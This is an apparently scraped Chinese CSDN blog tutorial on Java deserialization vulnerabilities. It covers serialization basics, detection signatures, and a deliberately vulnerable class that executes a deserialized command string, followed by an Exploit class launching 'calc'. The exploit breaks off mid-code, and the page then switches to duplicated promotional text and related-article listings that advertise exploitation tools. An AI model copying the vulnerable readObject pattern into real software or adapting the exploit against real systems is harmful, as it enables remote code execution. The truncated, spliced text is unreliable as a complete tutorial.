Java 反序列化漏洞_java反序列化漏洞(1)

最新推荐文章于 2024-07-15 22:02:35 发布
最新推荐文章于 2024-07-15 22:02:35 发布
阅读量306 收藏 5
点赞数 5
分类专栏: 程序员 文章标签: java python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84968977/article/details/138753404
版权

Java序列化基础知识

在Java中,如果想要对一个对象实现序列化,反序列化,那么这个对象的类必须要实现java.io.Serializable接口。序列化的实现由两种方法:

使用java.io.ObjectOutputStream类的方法

通过writeObject方法实现对象序列化

FileOutputStream f = new FileOutputStream("date.ser");
ObjectOutput s = new ObjectOutputStream(f);
s.writeObject(new Date());
s.flush();

通过readObject方法实现字节流反序列化

FileInputStream in = new FileInputStream("date.ser");
ObjectInputStream s = new ObjectInputStream(in);
Date date = (Date)s.readObject();

类实现Serializable接口

类实现接口会重写两个方法,writeObject和readObject。

Person类:

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Person implements Serializable {

    private String name;

    public Person(String name) {
        this.name = name;
    }

    private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
        // 反序列化时会调用此方法
        System.out.println("Person.readObject method is being called");
        // 这里从输入数据流里解码读取一个字符串,并将其设置为 name 属性
        name = s.readUTF();
    }

    private void writeObject(ObjectOutputStream s) throws IOException {
        // 序列化时会调用此方法
        System.out.println("Person.writeObject method is being called");
        // 这里将 name 属性字符串编码写入到输出数据流里
        s.writeUTF(name);
    };

    @Override
    public String toString() {
        return "Person{" +
                "name='" + name + '\'' +
                '}';
    }
}

创建Person对象

Person person = new Person("hacker");

ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(person);    // 对 Person 对象进行序列化
byte[] bytes = baos.toByteArray();  // 得到序列化后得到的字节数组

ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
ObjectInputStream ois = new ObjectInputStream(bais);
Person p = (Person) ois.readObject();   // 对 bytes 字节数组进行反序列化,得到 Person 对象

其它编程语言的序列化和反序列化也大体类似。

Java反序列化漏洞原理

当Java应用程序对来自外部输入的不可信数据进行反序列化时,就会形成反序列化漏洞。

java反序列化漏洞检测思路

数据包内出现字符串:0xaced 00 05(二进制数据的16进制数据表示) 或者 rO0AB(二进制数据的Base64编码)

测试代码:

package Example4;

import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class Dummy implements Serializable {

    private String cmd;

    public Dummy(String cmd) {
        this.cmd = cmd;
    }

    private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
        cmd = s.readUTF();	// 这里从输入数据流里解码读取一个字符串,并将其设置为属性 cmd
        Runtime.getRuntime().exec(cmd);	// 以属性 cmd 作为系统命令进行执行
    }

    private void writeObject(ObjectOutputStream s) throws IOException {
        s.writeUTF(cmd);
    };

}

攻击代码:

package Example4;

import java.io.*;
import java.nio.charset.StandardCharsets;

public class Exploit {
    public static void main(String[] args) throws IOException, ClassNotFoundException {
        Dummy dummy = new Dummy("calc");
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(dummy);
        byte[] bytes = baos.toByteArray();

        // 使用指定字符编码将 byte 数组转换为字符串
## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/4225955b2d83b7c250266237827bffe2.png)

![img](https://img-blog.csdnimg.cn/img_convert/473443b486d2e1019d292c59c5faa3ce.png)

![img](https://img-blog.csdnimg.cn/img_convert/e7d4cf9b87de1b78b16c8b88d20ad333.png)

![img](https://img-blog.csdnimg.cn/img_convert/7de0a0d9c2dfee72e2754657429a188b.png)

![img](https://img-blog.csdnimg.cn/img_convert/1d33072ba2be78efe345af3b4f6b0a42.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84968977
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全--反序列化漏洞java篇)
bobo_milk的博客
11-29 3155
java反序列化参考
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java 反序列化漏洞
qq_61553520的博客
05-24 5049
在各种编程语言反序列化漏洞中,Java是最引人瞩目的,因为Java开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
Java反序列化漏洞
MRS_jianai的博客
02-19 728
Java反序列化源码复现
Java反序列化漏洞详解(易懂)
最新发布
weixin_63350467的博客
07-15 1234
这篇文章主要还是让大家简单理解为啥会出现这个漏洞,以及查找漏洞的流程。对于java的序列化,反射,类加载等知识点的详细内容,大家可以自己感兴趣找找。这里主要还是让和我一样的小白简单理解一下这个漏洞的原理。
Java 安全之反序列化漏洞
hl1293348082的专栏
03-30 8000
1.序列化与反序列化: 序列化与反序列化对于 Java 程序员来说,应该不算陌生了,序列化与反序列化简单来说就是 Java 对象与数据之间的相互转化。 那么对于完全面向对象的 Java 语言来说为什么要有序列化机制? 实质上,序列化机制并不只局限于 Java 语言,序列化的本质是内存对象到数据流的一种转换,我们知道内存中的东西不具备持久性,但有些场景却需要将对象持久化保存或传输。例如缓存系统中存储了用户的 Session,如果缓存系统直接下线,带系统重启后用户就需要重新登陆,为了使缓存系统内存中的 S
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
java反序列化漏洞-验证.rar
06-25
1. **Java反序列化漏洞**:当不信任的数据源提供的序列化对象被反序列化时,如果对象的类包含危险的方法(如`ObjectInputStream.readObject()`),攻击者可以构造特殊的序列化数据来触发这些方法,执行任意代码。...
基于字节码搜索的Java反序列化漏洞调用链挖掘方法.pdf
06-27
Java反序列化漏洞是一种在Java应用程序中常见的安全漏洞,它发生在应用程序反序列化不可信的数据时,而这些数据可能被篡改,导致恶意代码执行。由于Java类库功能的不断更新与扩展,反序列化漏洞的潜在范围越来越广。...
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
java反序列化漏洞工具
03-07
该工具用于验证weblogic反序列化漏洞是否存在,工具语言java
Java反序列化漏洞分析
qq_51453285的博客
06-10 1106
Java反序列化漏洞Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码,导致反序列化过程中执行恶意代码。Java反序列化漏洞是由于Java序列化机制本身的缺陷导致的。为了防止恶意序列化数据被反序列化,可以在程序中对未知的序列化数据进行拒绝,或者对序列化数据进行白名单或黑名单的过滤。Java反序列化漏洞的攻击方式主要有两种:基于本地文件的反序列化攻击和基于网络的反序列化攻击。
java序列化_Java反序列化漏洞总结
weixin_39581845的博客
11-14 2711
前言什么是序列化和反序列化Java 提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。反序列化就是通过序列化后的字段还原成这个对象本身。但标识不被序列化的字段是不会被还原的。序列化有什么用1)网站相应的session对象存储在硬盘上,那么保存在session中的内容就必须实现相关的序列化操作。2)如果使...
Java反序列化漏洞及实例详解
ran的博客
04-15 3916
在这里我们将其原有的代码数据更改成了一个访问http的代码数据,当对方在进行反序列化的时候,就会将我们更改后的代码数据进行执行,就会对http进行访问。5.至此,我们可以想到,如果将反序列化的目标文件的内容进行修改,修改成具有攻击性的代码,那么就可以实现一定的攻击性行为。2.执行序列化部分的代码,可以看到在指定路径下生成了指定的文件,文件内包含序列化的内容。执行反序列化部分的代码,可以看到其反序列化成功,并且将原始的内容进行了返回。6.来到目标路径下可以看到生成的文件,以及文件内的序列化内容。
JAVA反序列化漏洞
KHOST的博客
05-11 579
Part 1 反序列化漏洞 JAVA反序列化漏洞到底是如何产生的? 1、由于很多站点或者RMI仓库等接口处存在java反序列化功能,于是攻击者可以通过构造特定的恶意对象序列化后的流,让目标反序列化,从而达到自己的恶意预期行为,包括命令执行,甚至 getshell 等等。 2、Apache Commons Collections是开源小组Apache研发的一个 Collections 收集器框架。这个框架中有一个InvokerTransformer.java接口,实现该接口的类可以...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值